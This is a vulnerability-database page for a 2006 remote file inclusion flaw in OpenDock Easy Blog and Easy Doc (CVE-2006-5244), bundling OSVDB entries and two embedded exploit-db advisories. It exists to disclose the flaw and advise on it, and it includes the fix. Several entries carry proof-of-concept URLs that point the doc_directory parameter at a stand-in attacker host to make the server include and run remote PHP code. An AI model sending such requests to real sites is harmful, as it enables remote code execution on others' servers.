Search...

OpenDock Easy Blog sw/lib_find/find.php doc_directory Variable Remote File Inclusion

2006-10-09T07:34:59

ID OSVDB:29642
Type osvdb
Reporter Dedi Dwianto(the_day@echo.or.id)
Modified 2006-10-09T07:34:59

Description

Technical Description

This vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).

Manual Testing Notes

http://[target]/[OpenDockEasyBlog_Path]/sw/lib_find/find.php?doc_directory=http://[attacker]/inject.txt?

References:

Vendor URL: http://web.opendock.net/ Security Tracker: 1017027 Secunia Advisory ID:22335 Related OSVDB ID: 29634 Related OSVDB ID: 29640 Related OSVDB ID: 29636 Related OSVDB ID: 29637 Related OSVDB ID: 29638 Related OSVDB ID: 29635 Related OSVDB ID: 29639 Related OSVDB ID: 29641 Other Advisory URL: http://advisories.echo.or.id/adv/adv50-theday-2006.txt Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-10/0108.html Keyword: ECHO_ADV_50$2006 ISS X-Force ID: 29399 Generic Exploit URL: http://milw0rm.com/exploits/2495 FrSIRT Advisory: ADV-2006-3970 CVE-2006-5244 Bugtraq ID: 20408

JSON Vulners Source

Initial Source

{"enchantments": {"score": {"vector": "NONE", "value": 5.0}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2006-5244"]}, {"type": "osvdb", "idList": ["OSVDB:29635", "OSVDB:29640", "OSVDB:29636", "OSVDB:29634", "OSVDB:29637", "OSVDB:29639", "OSVDB:29641", "OSVDB:29638"]}, {"type": "exploitdb", "idList": ["EDB-ID:2495", "EDB-ID:2494"]}], "modified": "2017-04-28T13:20:26"}, "vulnersScore": 5.0}, "bulletinFamily": "software", "affectedSoftware": [], "references": [], "href": "https://vulners.com/osvdb/OSVDB:29642", "id": "OSVDB:29642", "title": "OpenDock Easy Blog sw/lib_find/find.php doc_directory Variable Remote File Inclusion", "history": [], "type": "osvdb", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "lastseen": "2017-04-28T13:20:26", "edition": 1, "hash": "800592b2bf6afe9b50a41f630414ec0683c969a4c9d1da6680b1a74f9ddd2dd6", "objectVersion": "1.2", "reporter": "Dedi Dwianto(the_day@echo.or.id)", "description": "## Technical Description\nThis vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).\n## Manual Testing Notes\nhttp://[target]/[OpenDockEasyBlog_Path]/sw/lib_find/find.php?doc_directory=http://[attacker]/inject.txt?\n## References:\nVendor URL: http://web.opendock.net/\nSecurity Tracker: 1017027\n[Secunia Advisory ID:22335](https://secuniaresearch.flexerasoftware.com/advisories/22335/)\n[Related OSVDB ID: 29634](https://vulners.com/osvdb/OSVDB:29634)\n[Related OSVDB ID: 29640](https://vulners.com/osvdb/OSVDB:29640)\n[Related OSVDB ID: 29636](https://vulners.com/osvdb/OSVDB:29636)\n[Related OSVDB ID: 29637](https://vulners.com/osvdb/OSVDB:29637)\n[Related OSVDB ID: 29638](https://vulners.com/osvdb/OSVDB:29638)\n[Related OSVDB ID: 29635](https://vulners.com/osvdb/OSVDB:29635)\n[Related OSVDB ID: 29639](https://vulners.com/osvdb/OSVDB:29639)\n[Related OSVDB ID: 29641](https://vulners.com/osvdb/OSVDB:29641)\nOther Advisory URL: http://advisories.echo.or.id/adv/adv50-theday-2006.txt\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-10/0108.html\nKeyword: ECHO_ADV_50$2006\nISS X-Force ID: 29399\nGeneric Exploit URL: http://milw0rm.com/exploits/2495\nFrSIRT Advisory: ADV-2006-3970\n[CVE-2006-5244](https://vulners.com/cve/CVE-2006-5244)\nBugtraq ID: 20408\n", "modified": "2006-10-09T07:34:59", "viewCount": 0, "published": "2006-10-09T07:34:59", "cvelist": ["CVE-2006-5244"], "hashmap": [{"key": "affectedSoftware", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "bulletinFamily", "hash": "f9fa10ba956cacf91d7878861139efb9"}, {"key": "cvelist", "hash": "2071bfd8df1aaa6e627d62555a722b22"}, {"key": "cvss", "hash": "88e04999358e76acae57a21bcf224d40"}, {"key": "description", "hash": "e8f4104bcc8e908febb644178cc9d6ea"}, {"key": "href", "hash": "f1e08741517773e2a3b5cfa2269df928"}, {"key": "modified", "hash": "d79cfde3cfe7ec1ea0f5e43f40185751"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "d79cfde3cfe7ec1ea0f5e43f40185751"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "65bfa6c7727586bfdb190917d312a28d"}, {"key": "title", "hash": "ae8a6d0d461ec5b2a92520ab5398f7d1"}, {"key": "type", "hash": "1327ac71f7914948578f08c54f772b10"}]}

{"cve": [{"lastseen": "2018-10-18T15:05:37", "bulletinFamily": "NVD", "description": "Multiple PHP remote file inclusion vulnerabilities in OpenDock Easy Blog 1.4 and earlier, when register_globals is enabled, allow remote attackers to execute arbitrary PHP code via a URL in the doc_directory parameter in (1) down_stat.php, (2) file.php, (3) find_file.php, (4) lib_read_file.php, and (5) lib_form_file.php in sw/lib_up_file; (6) find_comment.php, (7) comment.php, and (8) lib_comment.php in sw/lib_comment/; (9) sw/lib_find/find.php; and other unspecified vectors.", "modified": "2018-10-17T17:41:52", "published": "2006-10-11T20:07:00", "id": "CVE-2006-5244", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-5244", "title": "CVE-2006-5244", "type": "cve", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:26", "bulletinFamily": "software", "description": "## Technical Description\nThis vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).\n## Manual Testing Notes\nhttp://[target]/[OpenDockEasyBlog_Path]/sw/lib_up_file/file.php?doc_directory=http://[attacker]/inject.txt?\n## References:\nVendor URL: http://web.opendock.net/\nSecurity Tracker: 1017027\n[Secunia Advisory ID:22335](https://secuniaresearch.flexerasoftware.com/advisories/22335/)\n[Related OSVDB ID: 29634](https://vulners.com/osvdb/OSVDB:29634)\n[Related OSVDB ID: 29640](https://vulners.com/osvdb/OSVDB:29640)\n[Related OSVDB ID: 29636](https://vulners.com/osvdb/OSVDB:29636)\n[Related OSVDB ID: 29637](https://vulners.com/osvdb/OSVDB:29637)\n[Related OSVDB ID: 29638](https://vulners.com/osvdb/OSVDB:29638)\n[Related OSVDB ID: 29639](https://vulners.com/osvdb/OSVDB:29639)\n[Related OSVDB ID: 29641](https://vulners.com/osvdb/OSVDB:29641)\n[Related OSVDB ID: 29642](https://vulners.com/osvdb/OSVDB:29642)\nOther Advisory URL: http://advisories.echo.or.id/adv/adv50-theday-2006.txt\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-10/0108.html\nKeyword: ECHO_ADV_50$2006\nISS X-Force ID: 29399\nGeneric Exploit URL: http://milw0rm.com/exploits/2495\nFrSIRT Advisory: ADV-2006-3970\n[CVE-2006-5244](https://vulners.com/cve/CVE-2006-5244)\nBugtraq ID: 20408\n", "modified": "2006-10-09T07:34:59", "published": "2006-10-09T07:34:59", "href": "https://vulners.com/osvdb/OSVDB:29635", "id": "OSVDB:29635", "title": "OpenDock Easy Blog sw/lib_up_file/file.php doc_directory Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:26", "bulletinFamily": "software", "description": "## Technical Description\nThis vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).\n## Manual Testing Notes\nhttp://[target]/[OpenDockEasyBlog_Path]/sw/lib_up_file/find_file.php?doc_directory=http://[attacker]/inject.txt?\n## References:\nVendor URL: http://web.opendock.net/\nSecurity Tracker: 1017027\n[Secunia Advisory ID:22335](https://secuniaresearch.flexerasoftware.com/advisories/22335/)\n[Related OSVDB ID: 29634](https://vulners.com/osvdb/OSVDB:29634)\n[Related OSVDB ID: 29640](https://vulners.com/osvdb/OSVDB:29640)\n[Related OSVDB ID: 29637](https://vulners.com/osvdb/OSVDB:29637)\n[Related OSVDB ID: 29638](https://vulners.com/osvdb/OSVDB:29638)\n[Related OSVDB ID: 29635](https://vulners.com/osvdb/OSVDB:29635)\n[Related OSVDB ID: 29639](https://vulners.com/osvdb/OSVDB:29639)\n[Related OSVDB ID: 29641](https://vulners.com/osvdb/OSVDB:29641)\n[Related OSVDB ID: 29642](https://vulners.com/osvdb/OSVDB:29642)\nOther Advisory URL: http://advisories.echo.or.id/adv/adv50-theday-2006.txt\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-10/0108.html\nKeyword: ECHO_ADV_50$2006\nISS X-Force ID: 29399\nGeneric Exploit URL: http://milw0rm.com/exploits/2495\nFrSIRT Advisory: ADV-2006-3970\n[CVE-2006-5244](https://vulners.com/cve/CVE-2006-5244)\nBugtraq ID: 20408\n", "modified": "2006-10-09T07:34:59", "published": "2006-10-09T07:34:59", "href": "https://vulners.com/osvdb/OSVDB:29636", "id": "OSVDB:29636", "title": "OpenDock Easy Blog sw/lib_up_file/find_file.php doc_directory Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:26", "bulletinFamily": "software", "description": "## Technical Description\nThis vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).\n## Manual Testing Notes\nhttp://[target]/[OpenDockEasyBlog_Path]/sw/lib_comment/comment.php?doc_directory=http://[attacker]/inject.txt?\n## References:\nVendor URL: http://web.opendock.net/\nSecurity Tracker: 1017027\n[Secunia Advisory ID:22335](https://secuniaresearch.flexerasoftware.com/advisories/22335/)\n[Related OSVDB ID: 29634](https://vulners.com/osvdb/OSVDB:29634)\n[Related OSVDB ID: 29636](https://vulners.com/osvdb/OSVDB:29636)\n[Related OSVDB ID: 29637](https://vulners.com/osvdb/OSVDB:29637)\n[Related OSVDB ID: 29638](https://vulners.com/osvdb/OSVDB:29638)\n[Related OSVDB ID: 29635](https://vulners.com/osvdb/OSVDB:29635)\n[Related OSVDB ID: 29639](https://vulners.com/osvdb/OSVDB:29639)\n[Related OSVDB ID: 29641](https://vulners.com/osvdb/OSVDB:29641)\n[Related OSVDB ID: 29642](https://vulners.com/osvdb/OSVDB:29642)\nOther Advisory URL: http://advisories.echo.or.id/adv/adv50-theday-2006.txt\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-10/0108.html\nKeyword: ECHO_ADV_50$2006\nISS X-Force ID: 29399\nGeneric Exploit URL: http://milw0rm.com/exploits/2495\nFrSIRT Advisory: ADV-2006-3970\n[CVE-2006-5244](https://vulners.com/cve/CVE-2006-5244)\nBugtraq ID: 20408\n", "modified": "2006-10-09T07:34:59", "published": "2006-10-09T07:34:59", "href": "https://vulners.com/osvdb/OSVDB:29640", "id": "OSVDB:29640", "title": "OpenDock Easy Blog sw/lib_comment/comment.php doc_directory Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:26", "bulletinFamily": "software", "description": "## Technical Description\nThis vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).\n## References:\nVendor URL: http://web.opendock.net/\nSecurity Tracker: 1017027\n[Secunia Advisory ID:22335](https://secuniaresearch.flexerasoftware.com/advisories/22335/)\n[Related OSVDB ID: 29634](https://vulners.com/osvdb/OSVDB:29634)\n[Related OSVDB ID: 29640](https://vulners.com/osvdb/OSVDB:29640)\n[Related OSVDB ID: 29636](https://vulners.com/osvdb/OSVDB:29636)\n[Related OSVDB ID: 29637](https://vulners.com/osvdb/OSVDB:29637)\n[Related OSVDB ID: 29635](https://vulners.com/osvdb/OSVDB:29635)\n[Related OSVDB ID: 29639](https://vulners.com/osvdb/OSVDB:29639)\n[Related OSVDB ID: 29641](https://vulners.com/osvdb/OSVDB:29641)\n[Related OSVDB ID: 29642](https://vulners.com/osvdb/OSVDB:29642)\nOther Advisory URL: http://advisories.echo.or.id/adv/adv50-theday-2006.txt\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-10/0108.html\nKeyword: ECHO_ADV_50$2006\nISS X-Force ID: 29399\nGeneric Exploit URL: http://milw0rm.com/exploits/2495\nFrSIRT Advisory: ADV-2006-3970\n[CVE-2006-5244](https://vulners.com/cve/CVE-2006-5244)\nBugtraq ID: 20408\n", "modified": "2006-10-09T07:34:59", "published": "2006-10-09T07:34:59", "href": "https://vulners.com/osvdb/OSVDB:29638", "id": "OSVDB:29638", "title": "OpenDock Easy Blog sw/lib_up_file/lib_form_file.php doc_directory Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:26", "bulletinFamily": "software", "description": "## Technical Description\nThis vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).\n## References:\nVendor URL: http://web.opendock.net/\nSecurity Tracker: 1017027\n[Secunia Advisory ID:22335](https://secuniaresearch.flexerasoftware.com/advisories/22335/)\n[Related OSVDB ID: 29634](https://vulners.com/osvdb/OSVDB:29634)\n[Related OSVDB ID: 29640](https://vulners.com/osvdb/OSVDB:29640)\n[Related OSVDB ID: 29636](https://vulners.com/osvdb/OSVDB:29636)\n[Related OSVDB ID: 29637](https://vulners.com/osvdb/OSVDB:29637)\n[Related OSVDB ID: 29638](https://vulners.com/osvdb/OSVDB:29638)\n[Related OSVDB ID: 29635](https://vulners.com/osvdb/OSVDB:29635)\n[Related OSVDB ID: 29639](https://vulners.com/osvdb/OSVDB:29639)\n[Related OSVDB ID: 29642](https://vulners.com/osvdb/OSVDB:29642)\nOther Advisory URL: http://advisories.echo.or.id/adv/adv50-theday-2006.txt\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-10/0108.html\nKeyword: ECHO_ADV_50$2006\nISS X-Force ID: 29399\nGeneric Exploit URL: http://milw0rm.com/exploits/2495\nFrSIRT Advisory: ADV-2006-3970\n[CVE-2006-5244](https://vulners.com/cve/CVE-2006-5244)\nBugtraq ID: 20408\n", "modified": "2006-10-09T07:34:59", "published": "2006-10-09T07:34:59", "href": "https://vulners.com/osvdb/OSVDB:29641", "id": "OSVDB:29641", "title": "OpenDock Easy Blog sw/lib_comment/lib_comment.php doc_directory Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:26", "bulletinFamily": "software", "description": "## Technical Description\nThis vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).\n## References:\nVendor URL: http://web.opendock.net/\nSecurity Tracker: 1017027\n[Secunia Advisory ID:22335](https://secuniaresearch.flexerasoftware.com/advisories/22335/)\n[Related OSVDB ID: 29634](https://vulners.com/osvdb/OSVDB:29634)\n[Related OSVDB ID: 29640](https://vulners.com/osvdb/OSVDB:29640)\n[Related OSVDB ID: 29636](https://vulners.com/osvdb/OSVDB:29636)\n[Related OSVDB ID: 29637](https://vulners.com/osvdb/OSVDB:29637)\n[Related OSVDB ID: 29638](https://vulners.com/osvdb/OSVDB:29638)\n[Related OSVDB ID: 29635](https://vulners.com/osvdb/OSVDB:29635)\n[Related OSVDB ID: 29641](https://vulners.com/osvdb/OSVDB:29641)\n[Related OSVDB ID: 29642](https://vulners.com/osvdb/OSVDB:29642)\nOther Advisory URL: http://advisories.echo.or.id/adv/adv50-theday-2006.txt\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-10/0108.html\nKeyword: ECHO_ADV_50$2006\nISS X-Force ID: 29399\nGeneric Exploit URL: http://milw0rm.com/exploits/2495\nFrSIRT Advisory: ADV-2006-3970\n[CVE-2006-5244](https://vulners.com/cve/CVE-2006-5244)\nBugtraq ID: 20408\n", "modified": "2006-10-09T07:34:59", "published": "2006-10-09T07:34:59", "href": "https://vulners.com/osvdb/OSVDB:29639", "id": "OSVDB:29639", "title": "OpenDock Easy Blog sw/lib_comment/find_comment.php doc_directory Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:26", "bulletinFamily": "software", "description": "## Technical Description\nThis vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).\n## References:\nVendor URL: http://web.opendock.net/\nSecurity Tracker: 1017027\n[Secunia Advisory ID:22335](https://secuniaresearch.flexerasoftware.com/advisories/22335/)\n[Related OSVDB ID: 29640](https://vulners.com/osvdb/OSVDB:29640)\n[Related OSVDB ID: 29636](https://vulners.com/osvdb/OSVDB:29636)\n[Related OSVDB ID: 29637](https://vulners.com/osvdb/OSVDB:29637)\n[Related OSVDB ID: 29638](https://vulners.com/osvdb/OSVDB:29638)\n[Related OSVDB ID: 29635](https://vulners.com/osvdb/OSVDB:29635)\n[Related OSVDB ID: 29639](https://vulners.com/osvdb/OSVDB:29639)\n[Related OSVDB ID: 29641](https://vulners.com/osvdb/OSVDB:29641)\n[Related OSVDB ID: 29642](https://vulners.com/osvdb/OSVDB:29642)\nOther Advisory URL: http://advisories.echo.or.id/adv/adv50-theday-2006.txt\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-10/0108.html\nKeyword: ECHO_ADV_50$2006\nISS X-Force ID: 29399\nGeneric Exploit URL: http://milw0rm.com/exploits/2495\nFrSIRT Advisory: ADV-2006-3970\n[CVE-2006-5244](https://vulners.com/cve/CVE-2006-5244)\nBugtraq ID: 20408\n", "modified": "2006-10-09T07:34:59", "published": "2006-10-09T07:34:59", "href": "https://vulners.com/osvdb/OSVDB:29634", "id": "OSVDB:29634", "title": "OpenDock Easy Blog sw/lib_up_file/down_stat.php doc_directory Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:26", "bulletinFamily": "software", "description": "## Technical Description\nThis vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).\n## References:\nVendor URL: http://web.opendock.net/\nSecurity Tracker: 1017027\n[Secunia Advisory ID:22335](https://secuniaresearch.flexerasoftware.com/advisories/22335/)\n[Related OSVDB ID: 29634](https://vulners.com/osvdb/OSVDB:29634)\n[Related OSVDB ID: 29640](https://vulners.com/osvdb/OSVDB:29640)\n[Related OSVDB ID: 29636](https://vulners.com/osvdb/OSVDB:29636)\n[Related OSVDB ID: 29638](https://vulners.com/osvdb/OSVDB:29638)\n[Related OSVDB ID: 29635](https://vulners.com/osvdb/OSVDB:29635)\n[Related OSVDB ID: 29639](https://vulners.com/osvdb/OSVDB:29639)\n[Related OSVDB ID: 29641](https://vulners.com/osvdb/OSVDB:29641)\n[Related OSVDB ID: 29642](https://vulners.com/osvdb/OSVDB:29642)\nOther Advisory URL: http://advisories.echo.or.id/adv/adv50-theday-2006.txt\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-10/0108.html\nKeyword: ECHO_ADV_50$2006\nISS X-Force ID: 29399\nGeneric Exploit URL: http://milw0rm.com/exploits/2495\nFrSIRT Advisory: ADV-2006-3970\n[CVE-2006-5244](https://vulners.com/cve/CVE-2006-5244)\nBugtraq ID: 20408\n", "modified": "2006-10-09T07:34:59", "published": "2006-10-09T07:34:59", "href": "https://vulners.com/osvdb/OSVDB:29637", "id": "OSVDB:29637", "title": "OpenDock Easy Blog sw/lib_up_file/lib_read_file.php doc_directory Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-01-31T16:23:18", "bulletinFamily": "exploit", "description": "OpenDock Easy Blog. CVE-2006-5244. Webapps exploit for php platform", "modified": "2006-10-09T00:00:00", "published": "2006-10-09T00:00:00", "id": "EDB-ID:2495", "href": "https://www.exploit-db.com/exploits/2495/", "type": "exploitdb", "title": "OpenDock Easy Blog <= 1.4 - doc_directory File Include Vulnerabilities", "sourceData": "ECHO_ADV_50$2006\r\n\r\n-----------------------------------------------------------------------------------------------\r\n[ECHO_ADV_50$2006]OpenDock Easy Blog <=1.4 (doc_directory) Multiple Remote File Inclusion Vulnerability\r\n-----------------------------------------------------------------------------------------------\r\n\r\nAuthor : Dedi Dwianto a.k.a the_day\r\nDate Found : October, 09th 2006\r\nLocation : Indonesia, Jakarta\r\nweb : http://advisories.echo.or.id/adv/adv50-theday-2006.txt\r\nCritical Lvl : Highly critical\r\nImpact : System access\r\nWhere : From Remote\r\n---------------------------------------------------------------------------\r\n\r\nAffected software description:\r\n~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n\r\nApplication : OpenDock Easy Blog\r\nversion : <=1.4\r\nURL : http://web.opendock.net\r\n\r\n---------------------------------------------------------------------------\r\n\r\nVulnerability:\r\n~~~~~~~~~~~~~\r\n\r\nIn folder sw/lib_up_file/ I found vulnerability script file.php\r\n--------------------------file.php---------------------------------------\r\n....\r\n<?\r\n\r\n include $doc_directory.$path_sw.\"lib_up_file/lib_file.php\";\r\n include $doc_directory.$path_sw.\"lib_up_file/lib_form_file.php\";\r\n include $doc_directory.$path_sw.\"lib_up_file/lib_read_file.php\";\r\n include $doc_directory.$path_sw.\"lib_up_file/lib_page_file.php\";\r\n include $doc_directory.$path_sw.\"lib_up_file/find_file.php\";\r\n include $doc_directory.$path_sw.\"lib_up_file/down_stat.php\";\r\n\r\n...\r\n----------------------------------------------------------\r\n\r\nInput passed to the \"$doc_directory\" parameter in file.php is not\r\nproperly verified before being used. This can be exploited to execute\r\narbitrary PHP code by including files from local or external\r\nresources.\r\n\r\nAlso affected files on Files:\r\n\r\nsw/lib_up_file/down_stat.php\r\nsw/lib_up_file/file.php\r\nsw/lib_up_file/find_file.php\r\nsw/lib_up_file/lib_read_file.php\r\nsw/lib_up_file/lib_form_file.php\r\nsw/lib_comment/find_comment.php\r\nsw/lib_comment/comment.php\r\nsw/lib_comment/lib_comment.php\r\nsw/lib_find/find.php\r\netc..\r\n\r\n\r\n\r\nProof Of Concept:\r\n~~~~~~~~~~~~~~\r\n\r\nhttp://target.com/[OpenDockEasyBlog_Path]/sw/lib_up_file/file.php?doc_directory=http://attacker.com/inject.txt?\r\nhttp://target.com/[OpenDockEasyBlog_Path]/sw/lib_up_file/find_file.php?doc_directory=http://attacker.com/inject.txt?\r\nhttp://target.com/[OpenDockEasyBlog_Path]/sw/lib_comment/comment.php?doc_directory=http://attacker.com/inject.txt?\r\nhttp://target.com/[OpenDockEasyBlog_Path]/sw/lib_find/find.php?doc_directory=http://attacker.com/inject.txt?\r\n\r\nSolution:\r\n~~~~~~\r\n- Sanitize variable $doc_directory on affected files.\r\n- Turn off register_globals\r\n\r\nTimeline:\r\n~~~~~~\r\n09 - 10 - 2006 Bugs Found\r\n09 - 10 - 2006 Vendor Contact\r\n09 - 10 - Public Disclosure\r\n\r\n---------------------------------------------------------------------------\r\n\r\nShoutz:\r\n~~\r\n~ y3dips,moby,comex,z3r0byt3,K-159,c-a-s-e,S`to,lirva32,anonymous\r\n~ Jessy My Brain\r\n~ az001,boom_3x,mathdule,angelia\r\n~ newbie_hacker@yahoogroups.com\r\n~ #aikmel - #e-c-h-o @irc.dal.net\r\n------------------------------------------------------------------------\r\n---\r\nContact:\r\n~~~\r\n EcHo Research & Development Center\r\n the_day[at]echo[dot]or[dot]id\r\n\r\n# milw0rm.com [2006-10-09]\r\n", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/2495/"}, {"lastseen": "2016-01-31T16:23:09", "bulletinFamily": "exploit", "description": "OpenDock Easy Doc. CVE-2006-5243,CVE-2006-5244. Webapps exploit for php platform", "modified": "2006-10-09T00:00:00", "published": "2006-10-09T00:00:00", "id": "EDB-ID:2494", "href": "https://www.exploit-db.com/exploits/2494/", "type": "exploitdb", "title": "OpenDock Easy Doc <= 1.4 - doc_directory File Include Vulnerabilities", "sourceData": "ECHO_ADV_49$2006\r\n\r\n-----------------------------------------------------------------------------------------------\r\n[ECHO_ADV_49$2006]OpenDock Easy Doc <=1.4 (doc_directory) Multiple Remote File Inclusion Vulnerability\r\n-----------------------------------------------------------------------------------------------\r\n\r\nAuthor : Dedi Dwianto a.k.a the_day\r\nDate Found : October, 09th 2006\r\nLocation : Indonesia, Jakarta\r\nweb : http://advisories.echo.or.id/adv/adv49-theday-2006.txt\r\nCritical Lvl : Highly critical\r\nImpact : System access\r\nWhere : From Remote\r\n---------------------------------------------------------------------------\r\n\r\nAffected software description:\r\n~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n\r\nApplication : OpenDock Easy Doc\r\nversion : <=1.4\r\nURL : http://web.opendock.net\r\n\r\n---------------------------------------------------------------------------\r\n\r\nVulnerability:\r\n~~~~~~~~~~~~~\r\n\r\nIn folder sw/lib_up_file/ I found vulnerability script file.php\r\n--------------------------file.php---------------------------------------\r\n....\r\n<?\r\n\r\n include $doc_directory.$path_sw.\"lib_up_file/lib_file.php\";\r\n include $doc_directory.$path_sw.\"lib_up_file/lib_form_file.php\";\r\n include $doc_directory.$path_sw.\"lib_up_file/lib_read_file.php\";\r\n include $doc_directory.$path_sw.\"lib_up_file/lib_page_file.php\";\r\n include $doc_directory.$path_sw.\"lib_up_file/find_file.php\";\r\n include $doc_directory.$path_sw.\"lib_up_file/down_stat.php\";\r\n\r\n...\r\n----------------------------------------------------------\r\n\r\nInput passed to the \"$doc_directory\" parameter in file.php is not\r\nproperly verified before being used. This can be exploited to execute\r\narbitrary PHP code by including files from local or external\r\nresources.\r\n\r\nAlso affected files on Files:\r\n\r\nsw/lib_up_file/down_stat.php\r\nsw/lib_up_file/file.php\r\nsw/lib_up_file/find_file.php\r\nsw/lib_up_file/lib_file.php\r\nsw/lib_up_file/lib_form_file.php\r\nsw/lib_comment/find_comment.php\r\nsw/lib_comment/comment.php\r\nsw/lib_comment/lib_comment.php\r\nsw/lib_find/find.php\r\netc..\r\n\r\n\r\n\r\nProof Of Concept:\r\n~~~~~~~~~~~~~~\r\n\r\nhttp://target.com/[OpenDockEasyDock_Path]/sw/lib_up_file/file.php?doc_directory=http://attacker.com/inject.txt?\r\nhttp://target.com/[OpenDockEasyDock_Path]/sw/lib_up_file/find_file.php?doc_directory=http://attacker.com/inject.txt?\r\nhttp://target.com/[OpenDockEasyDock_Path]/sw/lib_comment/comment.php?doc_directory=http://attacker.com/inject.txt?\r\nhttp://target.com/[OpenDockEasyDock_Path]/sw/lib_find/find.php?doc_directory=http://attacker.com/inject.txt?\r\n\r\nSolution:\r\n~~~~~~\r\n- Sanitize variable $doc_directory on affected files.\r\n- Turn off register_globals\r\n\r\nTimeline:\r\n~~~~~~\r\n09 - 10 - 2006 Bugs Found\r\n09 - 10 - 2006 Vendor Contact\r\n09 - 10 - Public Disclosure\r\n\r\n---------------------------------------------------------------------------\r\n\r\nShoutz:\r\n~~\r\n~ y3dips,moby,comex,z3r0byt3,K-159,c-a-s-e,S`to,lirva32,anonymous\r\n~ Jessy My Brain\r\n~ az001,boom_3x,mathdule,angelia\r\n~ newbie_hacker@yahoogroups.com\r\n~ #aikmel - #e-c-h-o @irc.dal.net\r\n------------------------------------------------------------------------\r\n---\r\nContact:\r\n~~~\r\n EcHo Research & Development Center\r\n the_day[at]echo[dot]or[dot]id\r\n\r\n# milw0rm.com [2006-10-09]\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/2494/"}]}